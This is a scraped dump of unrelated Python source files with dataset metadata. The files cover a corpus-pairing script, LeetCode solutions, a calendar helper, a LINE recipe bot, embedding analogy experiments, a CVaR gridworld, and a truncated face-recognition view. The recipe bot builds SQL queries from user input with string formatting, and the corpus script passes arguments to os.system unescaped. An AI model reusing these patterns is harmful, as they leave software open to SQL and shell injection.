'base' is the corpus name. 'thr' is the required threshold. Ideally to be set as 1.1\nlangs = ['as', 'bn', 'en', 'gu', 'hi', 'kn', 'ml', 'mni', 'mr', 'or', 'pa', 'ta', 'te', 'ur']\nbase = sys.argv[1]\nthr = sys.argv[2]\n\n## Saving the current working directory\ncwd = os.getcwd()\n\n## Saving the directory for the OPUS files\ncwd_opus = config.path_opus\n\n### Having a 2D for loop for all the 14C2 combinations\nfor i in range(len(langs)-1):\n\tfor j in range(i+1,len(langs)):\n\t\tprint('================================================')\n\t\tprint('The current pair is ' + langs[i] + ' ' + langs[j])\n\t\t\n\t\tbase_path = os.path.join(os.path.join(cwd_opus,base),langs[i] + \"-\" + langs[j])\n\t\tdirs = os.listdir(base_path) \n\t\t\n\t\t# If the folder is empty, i.e no file downloaded from OPUS\n\t\tif len(dirs)==0:\n\t\t\tcontinue \n\t\t\n\t\t### Calling the pair creation function for all the sentences\n\t\tcmd = 'python3 gen_opus_parallel_pair.py ' + langs[i] + ' ' + langs[j] + ' ' + base + ' overall.txt'\n\t\tos.system(cmd)\n\t\t\n\t\t# Coming back to the original cwd\n\t\tos.chdir(cwd)\n\n\t\t### Calling the pair creation function for all the sentences above the threshold \n\t\tcmd = 'python3 gen_opus_parallel_pair.py ' + langs[i] + ' ' + langs[j] + ' ' + base + ' t_' + thr + '.txt' \n\t\tos.system(cmd)\n\t\t\n\t\t# Coming back to the original cwd\n\t\tos.chdir(cwd)\t\t","sub_path":"data_collection/opus_tools/gen_opus_parallel_all.py","file_name":"gen_opus_parallel_all.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"427812482","text":"\"\"\"\n14. Longest Common Prefix\nEasy\n\nWrite a function to find the longest common prefix string amongst an array of strings.\n\nIf there is no common prefix, return an empty string \"\".\n\nExample 1:\n\nInput: [\"flower\",\"flow\",\"flight\"]\nOutput: \"fl\"\n\nExample 2:\n\nInput: [\"dog\",\"racecar\",\"car\"]\nOutput: \"\"\nExplanation: There is no common prefix among the input strings.\n\nNote:\n\nAll given inputs are in lowercase letters a-z.\n\"\"\"\n\nfrom typing import List\n\n###############################################################################\n\"\"\"\nSolution: go position by position (index i), comparing ith char of each string \nto ith char of 1st string. Return on 1st string that ends or on 1st mismatch.\n\nO(n * min_len) time, where n = number of strings, and min_len = min length \namong all strings\n\nO(min_len) extra space: for string copy s[:i]\n\"\"\"\nclass Solution:\n #def longestCommonPrefix(self, strs: List[str]) -> str:\n def longestCommonPrefix(self, arr: List[str]) -> str:\n if not arr:\n return \"\"\n\n n = len(arr)\n s = arr[0]\n m = len(s)\n\n for i in range(m): # loop through positions; ith char\n ch = s[i]\n\n for j in range(1, n): # loop through strings in array; jth string\n \n # Case 1: found another string with length <= first string,\n # and that string has ended.\n # Case 2: found a character mismatch\n if i == len(arr[j]) or arr[j][i] != ch:\n return s[:i]\n\n # s is the shortest string and no mismatch was found\n return s\n \n\"\"\"\nSolution 1b: same as sol 1, but find min length among all strings first.\n\nO(nm), where n = number of strings, and m = min string length\nO(m) extra space: for string copies s[:i] and s[:m]\n\"\"\" \nclass Solution1b:\n def longestCommonPrefix(self, arr: List[str]) -> str:\n if not arr:\n return \"\"\n\n s = arr[0]\n m = min(len(s) for s in arr) # min length among all strings\n\n for i in range(m): # loop through positions\n ch = s[i]\n if any(t[i] != ch for t in arr):\n return s[:i]\n\n return s[:m]\n\n\"\"\"\nSolution 1c: same as sol 1, but find string of min length first.\n\"\"\"\nclass Solution1c:\n def longestCommonPrefix(self, arr: List[str]) -> str:\n if not arr:\n return \"\"\n\n s = min(arr, key=len) # shortest string\n\n for i, ch in enumerate(s):\n if any(t[i] != ch for t in arr):\n return s[:i]\n\n return s\n\n###############################################################################\n\"\"\"\nSolution 2: use zip() and set().\n\"\"\"\nclass Solution2:\n def longestCommonPrefix(self, arr: List[str]) -> str:\n if not arr:\n return \"\"\n\n for i, letters_in_pos in enumerate(zip(*arr)):\n if len(set(letters_in_pos)) != 1:\n return arr[0][:i]\n\n return min(arr)\n\n###############################################################################\n\"\"\"\nSolution 3: use os.path.commonprefix()\n\"\"\"\nimport os\nclass Solution3:\n def longestCommonPrefix(self, arr: List[str]) -> str:\n return os.path.commonprefix(arr)\n\n###############################################################################\n\nif __name__ == \"__main__\":\n def test(arr, comment=None):\n print(\"=\"*80)\n if comment:\n print(comment)\n\n print(f\"\\narr = {arr}\")\n \n res = sol.longestCommonPrefix(arr)\n\n print(f\"\\nres = {res}\\n\")\n \n\n sol = Solution() # brute force\n sol = Solution1b() # find min length among all strings first\n sol = Solution1c() # find string of min length first\n\n sol = Solution2() # use zip() and set()\n #sol = Solution3() # use os.path.commonprefix()\n\n comment = \"LC ex1; answer = fl\"\n arr = [\"flower\",\"flow\",\"flight\"]\n test(arr, comment)\n\n comment = \"LC ex1; answer = (empty string)\"\n arr = [\"dog\",\"racecar\",\"car\"]\n test(arr, comment)\n\n comment = \"LC TC; answer = (empty string)\"\n arr = []\n test(arr, comment)\n\n comment = \"LC TC; answer = (empty string)\"\n arr = [\"\"]\n test(arr, comment)\n \n comment = \"LC TC; answer = a\"\n arr = [\"a\"]\n test(arr, comment)\n\n comment = \"LC TC; answer = a\"\n arr = [\"aa\", \"a\"]\n test(arr, comment)\n\n comment = \"LC TC; answer = aa\"\n arr = [\"aacc\",\"aa\",\"aa\",\"aa\",\"aaca\"]\n test(arr, comment)\n","sub_path":"string/0014_longest_common_prefix.py","file_name":"0014_longest_common_prefix.py","file_ext":"py","file_size_in_byte":4425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"509863056","text":"from googleapiclient.discovery import build\r\nfrom google_auth_oauthlib.flow import InstalledAppFlow\r\nimport pickle\r\nimport sys\r\nimport os\r\n\r\n# pip install --upgrade google-api-python-client google-auth-httplib2 google-auth-oauthlib\r\ndef create_meeting(dog_name, place, time, owner_email, client_email):\r\n path = os.path.dirname(__file__)\r\n credentials = pickle.load(open(f\"{path}/token.pkl\", \"rb\"))\r\n service = build(\"calendar\", \"v3\", credentials=credentials)\r\n\r\n event = {\r\n 'summary': 'Meeting with ' + dog_name,\r\n 'location': place,\r\n 'description': 'meeting with the dog and the owners',\r\n 'start': {\r\n 'dateTime': time +':00',\r\n 'timeZone': 'Asia/Jerusalem',\r\n },\r\n 'end': {\r\n 'dateTime': time +':00',\r\n 'timeZone': 'Asia/Jerusalem',\r\n },\r\n 'attendees': [\r\n {'email': owner_email},\r\n {'email': client_email}\r\n ],\r\n 'reminders': {\r\n 'useDefault': False,\r\n 'overrides': [\r\n {'method': 'email', 'minutes': 24 * 60},\r\n {'method': 'popup', 'minutes': 10},\r\n ],\r\n },\r\n }\r\n\r\n event = service.events().insert(calendarId='primary', body=event, sendUpdates='all').execute() # pylint: disable=no-member\r\n print ('Event created: %s' % (event.get('htmlLink')))\r\n\r\nif __name__ == '__main__':\r\n create_meeting(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4],sys.argv[5])","sub_path":"meeting/create_meeting.py","file_name":"create_meeting.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"42149384","text":"import storm\nimport langid\n#from dysl.langid import LangID\n\nclass GetLanguageBolt(storm.BasicBolt):\n def process(self, tup):\n text = tup.values[1]\n language = langid.classify(text)[0]\n #l = LangID()\n #l.train()\n #language = l.classify(text)\n storm.emit([tup.values[0], language])\n\nGetLanguageBolt().run()\n","sub_path":"multilang/resources/getlanguage.py","file_name":"getlanguage.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"650880413","text":"# coding:utf-8\nfrom flask_admin.contrib.sqla import ModelView\nfrom managesys import db, admin,is_debug\nfrom datetime import datetime\n\nclass ClientStatus(db.Model):\n\n id = db.Column(db.Integer, primary_key=True)\n pic_one = db.Column(db.Integer)\n pic_two= db.Column(db.Integer)\n face= db.Column(db.Integer)\n create_time = db.Column(db.DateTime)\n\n def __init__(self, pic_one, pic_two,face):\n self.pic_one = pic_one\n self.pic_two = pic_two\n\n def __repr__(self):\n return '' % self.usernam\n\nclass ClientStatusView(ModelView):\n # 是否允许创建\n can_create = False\n # 显示的字段\n column_searchable_list = ('pic_one', 'pic_two',\"face\",\"create_time\")\n\n def is_accessible(self):\n return is_debug\n\n def __init__(self, session, **kwargs):\n super(ClientStatusView, self).__init__(ClientStatus, session, **kwargs)\n\nadmin.add_view(ClientStatusView(db.session))","sub_path":"managesys/service/screen/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"166493254","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\na = np.arange(-4, 4)\nb = np.arange(5)\n\nlangs = ['C', 'C++', 'Java', 'Python', 'PHP']\nstudents = [23,17,35,29,12]\n\n\nplt.bar(langs, students, color ='maroon',\n width = 0.4)\n\nplt.xlabel(\"Courses offered\")\nplt.ylabel(\"No. of students enrolled\")\nplt.title(\"Students enrolled in different courses\")\nplt.show()\n\nprint()","sub_path":"classification/experiment/feature/experiment_bar_plot.py","file_name":"experiment_bar_plot.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"362986419","text":"import os\nimport psycopg2\n\nDATABASE_URL = os.environ['DATABASE_URL']\n\nconn = psycopg2.connect(DATABASE_URL, sslmode='require')\ncursor = conn.cursor()\n \ndef new_register(user_lineid):\n cursor.execute(\"INSERT INTO recipe(user_id) VALUES('{0}');\".format(user_lineid))\n conn.commit()\n return\n\ndef reg_menu_name(user_lineid, menu_name):\n # 最新のユーザーを取ってきてメニュー名を入れている\n cursor.execute(\"UPDATE recipe SET name = '{0}' WHERE id = (SELECT id FROM recipe WHERE user_id= '{1}' ORDER BY id DESC LIMIT 1);\".format(menu_name, user_lineid))\n conn.commit()\n return \n\ndef reg_menu_recipe(user_lineid, menu_recipe):\n # 最新のユーザーを取ってきてレシピを入れている\n cursor.execute(\"UPDATE recipe SET recipe = '{0}' WHERE id = (SELECT id FROM recipe WHERE user_id= '{1}' ORDER BY id DESC LIMIT 1);\".format(menu_recipe, user_lineid))\n conn.commit()\n return \n\ndef db_search(user_lineid, menu_name):\n # 同じ名前で登録した場合は最新のものを取ってくる\n cursor.execute(\"SELECT recipe FROM recipe WHERE user_id= '{0}' and name= '{1}' and recipe IS NOT NULL ORDER BY id DESC LIMIT 1;\".format(user_lineid, menu_name))\n hoge = cursor.fetchall()\n if len(hoge) == 0:\n return hoge\n else:\n return hoge[0][0]\n\n# 最新のユーザーは登録が終わっているか?\n# name も recipe も値を持っている ==> 登録終わっている/新規に追加可能\ndef finish_register(user_lineid):\n cursor.execute(\"SELECT * FROM recipe WHERE name IS NOT NULL and recipe IS NOT NULL and id = (SELECT id FROM recipe WHERE user_id= '{0}' ORDER BY id DESC LIMIT 1)\".format(user_lineid))\n hoge = cursor.fetchall()\n if len(hoge) == 0:\n return False\n else:\n return True\n\ndef serch_user(user_lineid):\n cursor.execute(\"SELECT * FROM recipe WHERE user_id= '{0}'\".format(user_lineid))\n hoge = cursor.fetchall()\n if len(hoge) == 0:\n return False\n else:\n return True\n\ndef check_latest_column(user_lineid, column):\n if column == 'name':\n # ユーザーの最新の情報から,nameが空でrecipeが空のものを抜き出す\n cursor.execute(\"SELECT * FROM recipe WHERE name IS NULL and recipe IS NULL and id = (SELECT id FROM recipe WHERE user_id= '{0}' ORDER BY id DESC LIMIT 1);\".format(user_lineid))\n if column == 'recipe':\n # ユーザーの最新の情報から,nameに値があってrecipeが空のものを抜き出す\n cursor.execute(\"SELECT * FROM recipe WHERE name IS NOT NULL and recipe IS NULL and id = (SELECT id FROM recipe WHERE user_id= '{0}' ORDER BY id DESC LIMIT 1);\".format(user_lineid))\n \n hoge = cursor.fetchall()\n if len(hoge) != 0:\n return False\n else:\n return True\n\n","sub_path":"db_line.py","file_name":"db_line.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"564065045","text":"def seive(n):\r\n\tl = [1 for i in range(n+1)]\r\n\tl[0] = l[1] = 0\r\n\tfor i in range(2, int(n**.5)+1):\r\n\t\tif l[i]:\r\n\t\t\tfor j in range(i+i, n+1, i):\r\n\t\t\t\tl[j] = 0\r\n\treturn [k for k, j in enumerate(l) if j]\r\nl = seive(32000)\r\ndef prime_factors(k):\r\n\td = {}\r\n\ti = 0\r\n\twhile 1:\r\n\t\tif i >= 3432:\r\n\t\t\td[k] = 1\r\n\t\t\tbreak\r\n\t\telif l[i] > k:\r\n\t\t\tbreak\r\n\t\telif k % l[i] == 0:\r\n\t\t\td[l[i]] = 1\r\n\t\t\tk //= l[i]\r\n\t\telse:\r\n\t\t\ti += 1\r\n\treturn d\r\n# print(l[:20])\r\nwhile 1:\r\n\tn = int(input())\r\n\tif n == 0:\r\n\t\tbreak\r\n\ts = prime_factors(n)\r\n\tfor i in s:\r\n\t\tn *= (1-1.0/i) \r\n\tprint(int(n))","sub_path":"relatives.py","file_name":"relatives.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"386993359","text":"import sys\n\ninFile1 = sys.argv[1]\ninFile2 = sys.argv[2]\n\nannotation = [x.strip() for x in open(inFile1,'r')]\nall_tweets = [x.strip() for x in open(inFile2,'r')]\n\ndictje = dict()\n\ncounter = 0\n\nfor event in all_tweets:\n\tcounter += 1\n\tsplitLine = event.split('\\t')\n\tident = splitLine[0].strip()\n\tdictje[ident] = event\n\ncount = 0\n\nfor event in annotation:\n\tsplitLine = event.split('\\t')\n\tident = splitLine[0].strip()\n\toldTweetsRanked = splitLine[5].split('-----')\n\toldTweetsRanked2 = splitLine[6].split('-----')\n\tprint(splitLine[3],splitLine[1],'\\n')\n\tprint(oldTweetsRanked[0])\n\tprint(oldTweetsRanked2[0],'\\n')\n\t\t\t\n\n","sub_path":"switch_old_tweets.py","file_name":"switch_old_tweets.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"441637841","text":"from elasticsearch_dsl import analyzer, tokenizer\nfrom django_elasticsearch_dsl_drf.versions import ELASTICSEARCH_GTE_7_0\n\n__all__ = (\"html_strip\",)\n\n# The ``standard`` filter has been removed in Elasticsearch 7.x.\nif ELASTICSEARCH_GTE_7_0:\n _filters = [\"lowercase\", \"stop\", \"snowball\", \"asciifolding\"]\nelse:\n _filters = [\"standard\", \"lowercase\", \"stop\", \"snowball\", \"asciifolding\"]\n\nhtml_strip = analyzer(\n \"html_strip\", tokenizer=\"lowercase\", filter=_filters, char_filter=[\"html_strip\"]\n)\n\n\ncustom_analyzer = analyzer(\n \"custom_analyzer\",\n tokenizer=tokenizer(\"trigram\", \"ngram\", min_gram=3, max_gram=3),\n filter=_filters,\n)\n","sub_path":"searchindexesapp/analyzers.py","file_name":"analyzers.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"548774446","text":"import argparse, datetime, measures, os, umls_tables_processing, utils\nfrom collections import defaultdict\nfrom multiprocessing import Pool\nimport numpy as np\n\nfrom gensim.models import KeyedVectors, Word2Vec\nfrom gensim.test.utils import datapath\n\n\ndef analog_loop(path, \n binary_bool,\n name,\n type_emb,\n L, K,\n K_type, logger,\n analog_comp_dict,\n #sets_relations,\n metrics,\n dict_labels_for_L = None):\n \n # Load the w2v model\n model = KeyedVectors.load_word2vec_format(path, binary=binary_bool)\n \n # Instantiation and log print\n analog_comp_dict[name] = {}\n logger.info('\\n\\n The name of embedding is: %s\\n', name)\n dict_t = {}\n dict_t[name] = {}\n \n # Loop over the relations\n for rela in umls_tables_processing.USEFUL_RELA:\n logger.info('\\n The RELA is: %s\\n', rela)\n \n # Check type of embedding\n if type_emb=='/cuis/':\n c = datetime.datetime.now().replace(microsecond=0)\n l0, k0 = measures.k_n_l_iov(L[rela], \n K[rela],\n model, \n logger = logger,\n emb_type = 'cui')\n \n # sets_relations keeps track of the number of pairs of K and L sets. \n # The number of filtered pairs on Vemb, per relation are stored\n# sets_relations[rela].append((name+'_l'+K_type, np.shape(l0)))\n# sets_relations[rela].append((name+'_k'+K_type, np.shape(k0)))\n \n # Save the pickle variable\n# utils.inputs_save(sets_relations, 'Utilities/sets_relations' + name + K_type)\n \n # Compute the analogy and store the results\n tmp = measures.analogy_compute(l0, k0, \n model,\n metrics,\n logger = logger,\n emb_type = 'cui')\n dict_t[name][rela] = tmp\n \n # Compute the sum of analogy hits and store it.\n #if len(tmp)>0:\n # analog_comp_dict[name][rela] = (sum(list(zip(*tmp))[2]), len(tmp))\n #else:\n # analog_comp_dict[name][rela] = (0, len(tmp)) \n\n utils.inputs_save(dict_t, 'Utilities/Analogical Data/' + name + K_type) \n #utils.inputs_save(analog_comp_dict, 'Utilities/count_analog_' + name + K_type)\n \n # Log of end of 'relation' operation\n logger.info('The time for RELA %s, for embedding %s is %s', \n rela,\n name,\n str(datetime.datetime.now().replace(microsecond=0)-c))\n \n # Check type of embedding: for word embeddings the dictionary of labels per cui is required\n elif (type_emb=='/words/') and (dict_labels_for_L is not None):\n c = datetime.datetime.now().replace(microsecond=0)\n \n # Filter the dictionary of labels keeping only the labels-words present into the embedding\n Vemb =utils.extract_w2v_vocab(model)\n dict_labels_inters_vemb = umls_tables_processing.discarding_labels_oov(Vemb, dict_labels_for_L)\n # Filtering L and K sets for present labels inside the embedding\n l0, k0 = measures.k_n_l_iov(L[rela], \n K[rela],\n model, \n logger = logger,\n dict_labels_for_L = dict_labels_inters_vemb,\n emb_type = 'labels')\n\n # Store number of filtered pairs\n# sets_relations[rela].append((name+'_l'+K_type, np.shape(l0)))\n# sets_relations[rela].append((name+'_k'+K_type, np.shape(k0)))\n\n# utils.inputs_save(sets_relations, 'Utilities/sets_relations' + name + K_type)\n \n tmp = measures.analogy_compute(l0, k0, \n model, \n metrics,\n logger = logger,\n dict_labels_for_L = dict_labels_inters_vemb, \n emb_type = 'labels') \n \n dict_t[name][rela] = tmp\n \n #if len(tmp)>0:\n # analog_comp_dict[name][rela] = (sum(list(zip(*tmp))[2]), len(tmp))\n #else:\n # analog_comp_dict[name][rela] = (0, len(tmp))\n \n utils.inputs_save(dict_t, 'Utilities/Analogical Data/' + name + K_type) \n #utils.inputs_save(analog_comp_dict, 'Utilities/count_analog_' + name + K_type)\n \n logger.info('The time for RELA %s, for embedding %s is %s', \n rela,\n name,\n str(datetime.datetime.now().replace(microsecond=0)-c))\n\n \ndef analog_pipe(L, K,\n dict_labels_for_L,\n logger, \n K_type,\n metrics,\n parallel = False,\n embedding_type = 'both'):\n \n a = datetime.datetime.now().replace(microsecond=0)\n \n # Storing expression of relations in sets K and L\n# sets_relations = defaultdict(list)\n# for k in umls_tables_processing.USEFUL_RELA:\n# sets_relations[k].append(('L_umls', np.shape(L[k])))\n# sets_relations[k].append(('K'+K_type, np.shape(K[k])))\n# print('Numbers of pairs for relationships stored')\n \n # Loading w2v files\n PATH_EMBEDDINGS = './Embeddings'\n embeddings = []\n \n # CUI or Word Embeddings discrimination\n if (embedding_type == 'cuis') or (embedding_type == 'both'):\n logger.info('CUI embeddings\\n'), \n cuis = ('/cuis/', [f.name for f in os.scandir(PATH_EMBEDDINGS+'/cuis') if (f.is_file())&(f.name != 'README.md')])\n embeddings.append(cuis)\n \n elif (embedding_type == 'words') or (embedding_type == 'both'):\n logger.info('Word embeddings\\n'), \n labels = ('/words/', [f.name for f in os.scandir(PATH_EMBEDDINGS+'/words') if (f.is_file())&(f.name != 'README.md')])\n embeddings.append(labels)\n \n # Universal dictionary instantiation\n analog_comp_dict = {}\n \n for type_emb in embeddings:\n b = datetime.datetime.now().replace(microsecond=0)\n if parallel:\n # Multiprocessing logic for evaluating at the same time K for only copd related concepts\n # and for seed related concepts\n # If processes are more than 4, the performance is low given the expensive memory cost\n if len(type_emb[1]) > 4:\n # Processes set at 2\n processes = 2\n # Elements of a chunk\n #n = int(np.ceil(len(embeddings[1][1])/processes))\n n = processes\n # A list of sublist with embedding names\n chunk_embs = [type_emb[1][i:i + n] for i in range(0, len(type_emb[1]), n)]\n print(chunk_embs)\n for chunk in chunk_embs:\n inp = []\n for title in chunk:\n # Creation of a process for each embedding (max two embeddings)\n inp.append((PATH_EMBEDDINGS+type_emb[0]+title,\n title.endswith('.bin'),\n os.path.splitext(title)[0],\n type_emb[0], \n L, K,\n K_type,\n logger,\n analog_comp_dict,\n #sets_relations,\n metrics,\n dict_labels_for_L))\n \n with Pool(processes = n) as pool:\n pool.starmap(analog_loop, inp) \n else:\n args = []\n for emb in type_emb[1]:\n # Instantiation of args for multiprocessing run\n args.append((PATH_EMBEDDINGS+type_emb[0]+emb,\n emb.endswith('.bin'),\n os.path.splitext(emb)[0],\n type_emb[0], \n L, K,\n K_type,\n logger,\n analog_comp_dict,\n #sets_relations,\n metrics,\n dict_labels_for_L)) \n \n logger.info('Preprocessing finished and multiprocessing running started\\n')\n with Pool(processes = len(args)) as pool:\n pool.starmap(analog_loop, args) \n else:\n for emb in type_emb[1]:\n analog_loop(PATH_EMBEDDINGS+type_emb[0]+emb, \n emb.endswith('.bin'),\n os.path.splitext(emb)[0],\n type_emb[0], \n L, K,\n K_type,\n logger,\n analog_comp_dict,\n #sets_relations,\n metrics,\n dict_labels_for_L)\n \n logger.info('The time for analogical computation of %s is %s', \n type_emb,\n str(datetime.datetime.now().replace(microsecond=0)-b)) \n logger.info('Execution time of analog_pipe: ' + str(datetime.datetime.now().replace(microsecond=0) - a) + '\\n')\n\n \nif __name__ == '__main__':\n # Parsing values for fast and intuitive launch of the script: \n # paralleling, embedding_type, copd_K_switch are inserted by command line.\n parser = argparse.ArgumentParser(description='Launching analogy computation')\n parser.add_argument('--p', \n dest='paralleling',\n type=bool,\n default = False,\n required=False,\n help='The multiprocessing switch')\n \n parser.add_argument('--t',\n dest='embedding_type',\n type=str,\n default = 'both',\n required=False,\n help='The type of analyzed embedding: it could be \"both\", \"cuis\", or \"words\"')\n \n parser.add_argument('--K_copd',\n dest='copd_K_switch',\n type=bool,\n default = False,\n required=False,\n help='The choosen K_umls set: True for copd K')\n \n parser.add_argument('--L',\n dest='L_type',\n type=bool,\n default = False,\n required=False,\n help='The choosen L_umls set: False for L, True for L=K')\n \n parser.add_argument('--K',\n dest='k_most_similar',\n type=int,\n default = 10,\n required=False,\n help='The choosen k_most_similar value')\n \n parser.add_argument('--eps',\n dest='eps',\n type=float,\n default = 0.0001,\n required=False,\n help='The choosen epsilon value')\n \n parser.add_argument('--m', \n nargs='+', \n dest='measure',\n default=['add'],\n type=str,\n help='The requested measures')\n \n args = parser.parse_args()\n print(args)\n \n # Check on quality of inserted data\n # Embedding type\n assert args.embedding_type in ['both', 'cuis', 'words'], \"Insert a string like 'both', 'cuis', or 'words'\"\n \n # Measures check\n assert ('all' in args.measure and len(args.measure)==1) or (len(set(args.measure).intersection(set(['add', 'mul', 'pair']))) == len(args.measure)), \"Choose if take 'all' or only certain measures among 'add', 'mul', 'pair'\"\n\n # Logger instantiation\n logger = utils.setup_custom_logger('myapp')\n logger.info('Start\\n')\n \n # K_umls only for copd related concepts or for all.\n if args.copd_K_switch:\n K_umls = umls_tables_processing.count_pairs(umls_tables_processing.USEFUL_RELA, \n cuis_list = [umls_tables_processing.COPD])\n label_K = '_umls_copd' \n \n else:\n # CUIs \n concepts = umls_tables_processing.concepts_related_to_concept(concept = umls_tables_processing.COPD,\n two_way = True,\n polishing_rels = False,\n switch_key = 'con',\n extract_labels = False)\n logger.info('Seeds built\\n')\n K_umls = umls_tables_processing.count_pairs(umls_tables_processing.USEFUL_RELA, cuis_list = concepts)\n label_K = '_umls'\n \n # Set L building - limited relations for lightening the compute\n if args.L_type:\n L_umls = K_umls\n label_K = '_LsameasK'+label_K\n else:\n L_umls = umls_tables_processing.count_pairs(umls_tables_processing.USEFUL_RELA)\n \n logger.info('Sets created\\n')\n \n # Building the dictionary for labels case\n # Collecting all the CUIs involved in set L\n if (args.embedding_type == 'words') | (args.embedding_type == 'both'):\n jh = []\n for v in L_umls.values():\n jh.append(list(set(list(zip(*v))[0])))\n jh.append(list(set(list(zip(*v))[1])))\n tmp = set([j for i in jh for j in i ])\n dict_strings = umls_tables_processing.cui_strings() \n dict_labels_for_L, _ = umls_tables_processing.extracting_strings(list(tmp), dict_strings = dict_strings)\n \n else:\n dict_labels_for_L = None\n logger.info('Dictionary of labels from set L built\\n')\n \n # Building the dictionary for the measure, in place of the switch-case logic\n meas_dict = {'add': [measures.cos3add, args.k_most_similar],\n 'mul': [measures.cos3mul, args.eps], \n 'pair': [measures.pair_direction, args.eps]}\n \n if 'all' in args.measure:\n meas_dict = meas_dict\n \n else:\n m = np.sort(args.measure).tolist()\n meas_dict = {key: meas_dict[key] for key in m if key in meas_dict}\n \n # Start analogy pipeline\n analog_pipe(L_umls, K_umls, \n dict_labels_for_L, \n logger, \n label_K, \n meas_dict,\n parallel = args.paralleling,\n embedding_type = args.embedding_type)\n \n ","sub_path":"analogy_pipeline.py","file_name":"analogy_pipeline.py","file_ext":"py","file_size_in_byte":15588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"520566812","text":"from cvar.gridworld.core.constants import gamma\nfrom cvar.gridworld.cliffwalker import *\nfrom cvar.gridworld.core import cvar_computation\nfrom cvar.gridworld.core.constants import gamma\nfrom cvar.gridworld.core.runs import epoch\nfrom cvar.gridworld.algorithms.value_iteration import value_iteration\n\n\ndef several_epochs(arg):\n np.random.seed()\n world, policy, nb_epochs = arg\n rewards = np.zeros(nb_epochs)\n\n for i in range(nb_epochs):\n S, A, R = epoch(world, policy)\n policy.reset()\n rewards[i] = np.sum(R)\n rewards[i] = np.dot(R, np.array([gamma ** i for i in range(len(R))]))\n\n return rewards\n\n\ndef policy_stats(world, policy, alpha, nb_epochs, verbose=True):\n import copy\n import multiprocessing as mp\n threads = 4\n\n with mp.Pool(threads) as p:\n rewards = p.map(several_epochs, [(world, copy.deepcopy(policy), int(nb_epochs/threads)) for _ in range(threads)])\n\n rewards = np.array(rewards).flatten()\n\n var, cvar = cvar_computation.var_cvar_from_samples(rewards, alpha)\n if verbose:\n print('----------------')\n print(policy.__name__)\n print('expected value=', np.mean(rewards))\n print('cvar_{}={}'.format(alpha, cvar))\n # print('var_{}={}'.format(alpha, var))\n\n return cvar, rewards\n\n\ndef exhaustive_stats(world, epochs, *args):\n V = value_iteration(world)\n\n alphas = np.array([1.0, 0.5, 0.25, 0.1, 0.05, 0.025, 0.01, 0.005, 0.001])\n\n cvars = np.zeros((len(args), len(alphas)))\n names = []\n\n for i, policy in enumerate(args):\n names.append(policy.__name__)\n for j, alpha in enumerate(alphas):\n pol = policy(V, alpha)\n\n cvars[i, j], _ = policy_stats(world, pol, alpha=alpha, nb_epochs=int(epochs), verbose=False)\n\n print('{}_{} done...'.format(pol.__name__, alpha))\n\n import pickle\n pickle.dump({'cvars': cvars, 'alphas': alphas, 'names': names}, open('data/stats.pkl', 'wb'))\n print(cvars)\n\n from cvar.gridworld.plots.other import plot_cvars\n plot_cvars()\n\n\nif __name__ == '__main__':\n import pickle\n from cvar.gridworld.plots.grid import InteractivePlotMachine\n\n # np.random.seed(2)\n # # ============================= new config\n stoch = 0.1\n world = GridWorld(7, 10, random_action_p=stoch)\n V = value_iteration(world, max_iters=1000, eps_convergence=1e-5)\n pickle.dump((world, V), open('./results/vi_{}.pkl'.format(stoch), mode='wb'))\n\n # ============================= load\n world, V = pickle.load(open('./results/vi_{}.pkl'.format(stoch), 'rb'))\n\n for alpha in [1,0.04, 0.01]:\n # ============================= RUN\n img = np.array([V.V[ix].cvar_alpha(alpha) for ix in np.ndindex(V.V.shape)]).reshape(V.V.shape)\n pickle.dump(img, open('./results/map_{}_{}.pkl'.format(alpha, stoch), 'wb'))\n\n #Optimal path\n path = V.optimal_path(alpha)\n opt_path = [ [s[1] for s in path], [s[0] for s in path] ]\n pickle.dump(opt_path, open('./results/path_{}_{}.pkl'.format(alpha, stoch), 'wb'))\n\n \n # pm = InteractivePlotMachine(world, V, alpha=0.01, stochasticity = stoch)\n # # pm.show()\n\n # pm = InteractivePlotMachine(world, V, alpha=0.1, stochasticity = stoch)\n # # pm.show()\n\n # pm = InteractivePlotMachine(world, V, alpha=1, stochasticity = stoch)\n # # pm.show()\n\n","sub_path":"cvar/gridworld/run_vi.py","file_name":"run_vi.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"304268548","text":"import logging\nimport os\nimport pickle\nimport random\nimport string\n\nimport face_recognition\nimport numpy as np\nfrom PIL import Image\nimport cv2\nfrom django.conf import settings\nfrom django.shortcuts import render\nfrom mtcnn.mtcnn import MTCNN\n# Create your views here.\nfrom rest_framework import generics, status, permissions\nfrom rest_framework.response import Response\n\n# from Faceapp.utils import check_face\nfrom FaceRecognition.settings import KNOWN_FACE_DIRECTORY\n\nlogger = logging.getLogger(__name__)\n\nclass FaceRecognitionView(generics.GenericAPIView):\n def post(self,request):\n try:\n data = request.data\n logger.info('Request Payload {}'.format(data))\n patient_photo = data.get('patient_photo')\n if not patient_photo:\n return Response({'status': 'fail', 'message': 